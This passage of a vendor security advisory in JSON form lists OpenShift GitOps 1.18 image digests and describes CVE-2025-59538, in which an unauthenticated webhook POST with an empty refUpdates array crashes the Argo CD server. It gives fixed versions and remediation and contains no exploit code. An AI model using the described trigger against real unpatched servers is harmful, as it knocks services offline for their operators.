"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:5fb796a21d73e4baf25c8a116c69447ef0d5de6db86b0e3b65df68373f4b10d0_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:82b5c2760800ab618b4d1fbd7e713765181f57123636ecb34d0f700af5b64945_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e9197abd503e4a97ef55984334e4d0de594d3b9a5e542bbe475322f966b8fefd_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f8f99349426e5ab977acdda440c22e5d04187ca43e05f91c8b5bbb823eaf59f6_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2cfd5c1921d34fe92c312d0929599207266c0b14207b987edda7eb838728e554_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2fa4d567a4de620a81f1678596b74fa9bcb3dd060e71549917e819ef4b5a80f0_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:3a250c6cf16f5676d412f11d48ca6e84f5681c899ed75c8248e6dd0184bdcc5d_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:d2d1a76ff456e08e2b217aa01530b7f6b9fb91c40388cee14c0df77245ac5789_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:67069d6db9ef08a8653964aa24a13a97da97f2238210dbdb085988014f77e990_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:a5bd0b0d1677ffc3b4117082a91588316d5f4cefba1265051cbad07856f99969_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:d9b83dd9c9a3a76315a830cb1e995964e697dc025b1d552d1e5bf6acd94f7186_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f988a63f8f11e2cbfef19c9d02905a69daf783ac05e6e9c042f13c697e87479a_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:1d6f9b5cdf776ef51e96e738f726d3dd797304ab44bc313ded7a6d280fe12a95_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:73cbdb023ab9abf39602b4a15f9a68515aad37c14a1bbff060b906570ab9d2c3_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:b0408f958ef20c3f6230d392049b261ebfbd50f5f8e5b0e9776b20726fc9c83a_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:cc5b889fa32b5476f29a9d36eb28de80c4288cbf366e86a3aa82fb4a6993b63b_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:2cb3b46616a69b95620a59b43e9aadbe02e98b984434d1a47410a603de4d1598_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:d84d629b8e7e99fca60a227053ea4aae2ada53e1720ad928ebc627465e99b9a8_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e03a5803646011ab083c958f52f8f9d7c8025572e95f522768d260961c72469c_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e7561d1e7e220cca0cabb9e28a7a9594a1cebf771546382e6302c98a79d82e7e_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:22f95edd885609dfbf1b606fc5d41f2efa5361cbec1f1918e5d774a030779ea0_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94793fe05dede5787dacf889f6e51e9385d3b312e7500514f88ea6fa608b0089_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:dafab1379d8bf3af9d2794a5d249901a4d045b7ee1e129669001b922ccdc9f98_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:df33bf847baaeff2432a5e2e22853a89cd15fd8a3f14cabc233b38d3e9dcacc4_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:7f9756472d19ba870990b7348cd693dc850d333ae2202d56dbdf9d7dd0ff01bb_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:cc6ca27fa4823083354c3879efb3a2733f377965528fda892cf1aa7823cc35ea_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:eb5cfcb3d2da257dcac23086cdef0e16487885c14badf5577f36c22b6e9a7d43_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f20831b8df3104e7ae3e147ea3df202433d0f20e6b1bfb1259fe71bae8f9c2b5_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:a27b8dd047e10fbbd6fc49176036c9b5178a1d2841e26719bfde23239ede157d_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:702e2376cbe077fd68686ab54f25be3d2b87696b1cf956c48465f609b97fff8e_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:87bcc0a5bc2f67d609161d346d3fee760b292db0dac42ef7393dad2054700257_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a2d7c119c287bc7ab8751d4435b7e80749618abf4d98a2704a3f786d239dc86d_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:b756f5cd7270e033a99c1c90c7e63567ee88f40f41764bf35573528d8a275eae_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b0369e0bddef1a52941482bfbe88f72674de51dfcc7f30ddb98b410476ae4785_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b8f986a933e626883b0bf03fdf253ce4c74d82931342ede909324de1da1ae327_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:bd3eb63c087dbd5f807b9e7cf680c0de1c3408dd9f12b7eb6e98f8221ca28a8f_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:e2fdaac8c55eefe25f63c0742f8bd14066abb33b7a5f746157fad65b5b99d092_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:049800b51d49a8f5320ed013eea46695eb7f0eeee26459f18a51f5d1023e6a8c_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:05de1e5e8aeb9bbaab90f03fd3cf1746bc79053de779c45ab850f5592f29e094_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:9c79c05230debdba71ef6cefc26e39b0a5134fbe00aad9ce667c277aa8e34228_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:a424e822277befdf5d414c5aa5e1f5e359d56c5e9fc5da02e451a59244559966_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "github.com/argoproj/argo-cd: Argo CD unauthenticated Denial of Service"
},
{
"cve": "CVE-2025-59538",
"cwe": {
"id": "CWE-703",
"name": "Improper Check or Handling of Exceptional Conditions"
},
"discovery_date": "2025-10-01T22:00:57.544949+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:5fb796a21d73e4baf25c8a116c69447ef0d5de6db86b0e3b65df68373f4b10d0_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:82b5c2760800ab618b4d1fbd7e713765181f57123636ecb34d0f700af5b64945_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e9197abd503e4a97ef55984334e4d0de594d3b9a5e542bbe475322f966b8fefd_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f8f99349426e5ab977acdda440c22e5d04187ca43e05f91c8b5bbb823eaf59f6_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2cfd5c1921d34fe92c312d0929599207266c0b14207b987edda7eb838728e554_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2fa4d567a4de620a81f1678596b74fa9bcb3dd060e71549917e819ef4b5a80f0_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:3a250c6cf16f5676d412f11d48ca6e84f5681c899ed75c8248e6dd0184bdcc5d_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:d2d1a76ff456e08e2b217aa01530b7f6b9fb91c40388cee14c0df77245ac5789_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:67069d6db9ef08a8653964aa24a13a97da97f2238210dbdb085988014f77e990_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:a5bd0b0d1677ffc3b4117082a91588316d5f4cefba1265051cbad07856f99969_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:d9b83dd9c9a3a76315a830cb1e995964e697dc025b1d552d1e5bf6acd94f7186_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f988a63f8f11e2cbfef19c9d02905a69daf783ac05e6e9c042f13c697e87479a_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:22f95edd885609dfbf1b606fc5d41f2efa5361cbec1f1918e5d774a030779ea0_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94793fe05dede5787dacf889f6e51e9385d3b312e7500514f88ea6fa608b0089_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:dafab1379d8bf3af9d2794a5d249901a4d045b7ee1e129669001b922ccdc9f98_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:df33bf847baaeff2432a5e2e22853a89cd15fd8a3f14cabc233b38d3e9dcacc4_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:7f9756472d19ba870990b7348cd693dc850d333ae2202d56dbdf9d7dd0ff01bb_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:cc6ca27fa4823083354c3879efb3a2733f377965528fda892cf1aa7823cc35ea_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:eb5cfcb3d2da257dcac23086cdef0e16487885c14badf5577f36c22b6e9a7d43_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f20831b8df3104e7ae3e147ea3df202433d0f20e6b1bfb1259fe71bae8f9c2b5_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:702e2376cbe077fd68686ab54f25be3d2b87696b1cf956c48465f609b97fff8e_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:87bcc0a5bc2f67d609161d346d3fee760b292db0dac42ef7393dad2054700257_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a2d7c119c287bc7ab8751d4435b7e80749618abf4d98a2704a3f786d239dc86d_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:b756f5cd7270e033a99c1c90c7e63567ee88f40f41764bf35573528d8a275eae_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b0369e0bddef1a52941482bfbe88f72674de51dfcc7f30ddb98b410476ae4785_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b8f986a933e626883b0bf03fdf253ce4c74d82931342ede909324de1da1ae327_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:bd3eb63c087dbd5f807b9e7cf680c0de1c3408dd9f12b7eb6e98f8221ca28a8f_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:e2fdaac8c55eefe25f63c0742f8bd14066abb33b7a5f746157fad65b5b99d092_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:049800b51d49a8f5320ed013eea46695eb7f0eeee26459f18a51f5d1023e6a8c_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:05de1e5e8aeb9bbaab90f03fd3cf1746bc79053de779c45ab850f5592f29e094_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:9c79c05230debdba71ef6cefc26e39b0a5134fbe00aad9ce667c277aa8e34228_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:a424e822277befdf5d414c5aa5e1f5e359d56c5e9fc5da02e451a59244559966_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2400940"
}
],
"notes": [
{
"category": "description",
"text": "Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. For versions 2.9.0-rc1 through 2.14.19, 3.0.0-rc1 through 3.2.0-rc1, 3.1.6 and 3.0.17, when the webhook.azuredevops.username and webhook.azuredevops.password are not set in the default configuration, the /api/webhook endpoint crashes the entire argocd-server process when it receives an Azure DevOps Push event whose JSON array resource.refUpdates is empty. The slice index [0] is accessed without a length check, causing an index-out-of-range panic. A single unauthenticated HTTP POST is enough to kill the process. This issue is resolved in versions 2.14.20, 3.2.0-rc2, 3.1.8 and 3.0.19.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/argoproj/argo-cd: Argo CD unauthenticated Remote Denial of Service",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The availability risk of this vulnerability is limited to the Argo-CD application. General host availability is not at risk.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:1d6f9b5cdf776ef51e96e738f726d3dd797304ab44bc313ded7a6d280fe12a95_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:73cbdb023ab9abf39602b4a15f9a68515aad37c14a1bbff060b906570ab9d2c3_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:b0408f958ef20c3f6230d392049b261ebfbd50f5f8e5b0e9776b20726fc9c83a_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:cc5b889fa32b5476f29a9d36eb28de80c4288cbf366e86a3aa82fb4a6993b63b_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:2cb3b46616a69b95620a59b43e9aadbe02e98b984434d1a47410a603de4d1598_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:d84d629b8e7e99fca60a227053ea4aae2ada53e1720ad928ebc627465e99b9a8_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e03a5803646011ab083c958f52f8f9d7c8025572e95f522768d260961c72469c_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e7561d1e7e220cca0cabb9e28a7a9594a1cebf771546382e6302c98a79d82e7e_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:a27b8dd047e10fbbd6fc49176036c9b5178a1d2841e26719bfde23239ede157d_amd64"
],
"known_not_affected": [
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:5fb796a21d73e4baf25c8a116c69447ef0d5de6db86b0e3b65df68373f4b10d0_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:82b5c2760800ab618b4d1fbd7e713765181f57123636ecb34d0f700af5b64945_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e9197abd503e4a97ef55984334e4d0de594d3b9a5e542bbe475322f966b8fefd_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f8f99349426e5ab977acdda440c22e5d04187ca43e05f91c8b5bbb823eaf59f6_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2cfd5c1921d34fe92c312d0929599207266c0b14207b987edda7eb838728e554_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2fa4d567a4de620a81f1678596b74fa9bcb3dd060e71549917e819ef4b5a80f0_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:3a250c6cf16f5676d412f11d48ca6e84f5681c899ed75c8248e6dd0184bdcc5d_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:d2d1a76ff456e08e2b217aa01530b7f6b9fb91c40388cee14c0df77245ac5789_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:67069d6db9ef08a8653964aa24a13a97da97f2238210dbdb085988014f77e990_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:a5bd0b0d1677ffc3b4117082a91588316d5f4cefba1265051cbad07856f99969_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:d9b83dd9c9a3a76315a830cb1e995964e697dc025b1d552d1e5bf6acd94f7186_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f988a63f8f11e2cbfef19c9d02905a69daf783ac05e6e9c042f13c697e87479a_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:22f95edd885609dfbf1b606fc5d41f2efa5361cbec1f1918e5d774a030779ea0_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94793fe05dede5787dacf889f6e51e9385d3b312e7500514f88ea6fa608b0089_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:dafab1379d8bf3af9d2794a5d249901a4d045b7ee1e129669001b922ccdc9f98_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:df33bf847baaeff2432a5e2e22853a89cd15fd8a3f14cabc233b38d3e9dcacc4_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:7f9756472d19ba870990b7348cd693dc850d333ae2202d56dbdf9d7dd0ff01bb_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:cc6ca27fa4823083354c3879efb3a2733f377965528fda892cf1aa7823cc35ea_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:eb5cfcb3d2da257dcac23086cdef0e16487885c14badf5577f36c22b6e9a7d43_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f20831b8df3104e7ae3e147ea3df202433d0f20e6b1bfb1259fe71bae8f9c2b5_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:702e2376cbe077fd68686ab54f25be3d2b87696b1cf956c48465f609b97fff8e_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:87bcc0a5bc2f67d609161d346d3fee760b292db0dac42ef7393dad2054700257_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a2d7c119c287bc7ab8751d4435b7e80749618abf4d98a2704a3f786d239dc86d_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:b756f5cd7270e033a99c1c90c7e63567ee88f40f41764bf35573528d8a275eae_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b0369e0bddef1a52941482bfbe88f72674de51dfcc7f30ddb98b410476ae4785_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b8f986a933e626883b0bf03fdf253ce4c74d82931342ede909324de1da1ae327_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:bd3eb63c087dbd5f807b9e7cf680c0de1c3408dd9f12b7eb6e98f8221ca28a8f_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:e2fdaac8c55eefe25f63c0742f8bd14066abb33b7a5f746157fad65b5b99d092_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:049800b51d49a8f5320ed013eea46695eb7f0eeee26459f18a51f5d1023e6a8c_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:05de1e5e8aeb9bbaab90f03fd3cf1746bc79053de779c45ab850f5592f29e094_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:9c79c05230debdba71ef6cefc26e39b0a5134fbe00aad9ce667c277aa8e34228_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:a424e822277befdf5d414c5aa5e1f5e359d56c5e9fc5da02e451a59244559966_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-59538"
},
{
"category": "external",
"summary": "RHBZ#2400940",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2400940"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-59538",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59538"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-59538",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59538"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-cd/commit/1a023f1ca7fe4ec942b4b6696804988d5a632baf",
"url": "https://github.com/argoproj/argo-cd/commit/1a023f1ca7fe4ec942b4b6696804988d5a632baf"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-gpx4-37g2-c8pv",
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-gpx4-37g2-c8pv"
}
],
"release_date": "2025-10-01T21:09:08.870000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-10-15T10:27:05+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:1d6f9b5cdf776ef51e96e738f726d3dd797304ab44bc313ded7a6d280fe12a95_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:73cbdb023ab9abf39602b4a15f9a68515aad37c14a1bbff060b906570ab9d2c3_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:b0408f958ef20c3f6230d392049b261ebfbd50f5f8e5b0e9776b20726fc9c83a_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:cc5b889fa32b5476f29a9d36eb28de80c4288cbf366e86a3aa82fb4a6993b63b_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:2cb3b46616a69b95620a59b43e9aadbe02e98b984434d1a47410a603de4d1598_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:d84d629b8e7e99fca60a227053ea4aae2ada53e1720ad928ebc627465e99b9a8_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e03a5803646011ab083c958f52f8f9d7c8025572e95f522768d260961c72469c_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e7561d1e7e220cca0cabb9e28a7a9594a1cebf771546382e6302c98a79d82e7e_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:a27b8dd047e10fbbd6fc49176036c9b5178a1d2841e26719bfde23239ede157d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:18093"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:5fb796a21d73e4baf25c8a116c69447ef0d5de6db86b0e3b65df68373f4b10d0_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:82b5c2760800ab618b4d1fbd7e713765181f57123636ecb34d0f700af5b64945_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e9197abd503e4a97ef55984334e4d0de594d3b9a5e542bbe475322f966b8fefd_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f8f99349426e5ab977acdda440c22e5d04187ca43e05f91c8b5bbb823eaf59f6_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2cfd5c1921d34fe92c312d0929599207266c0b14207b987edda7eb838728e554_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2fa4d567a4de620a81f1678596b74fa9bcb3dd060e71549917e819ef4b5a80f0_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:3a250c6cf16f5676d412f11d48ca6e84f5681c899ed75c8248e6dd0184bdcc5d_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:d2d1a76ff456e08e2b217aa01530b7f6b9fb91c40388cee14c0df77245ac5789_arm64",
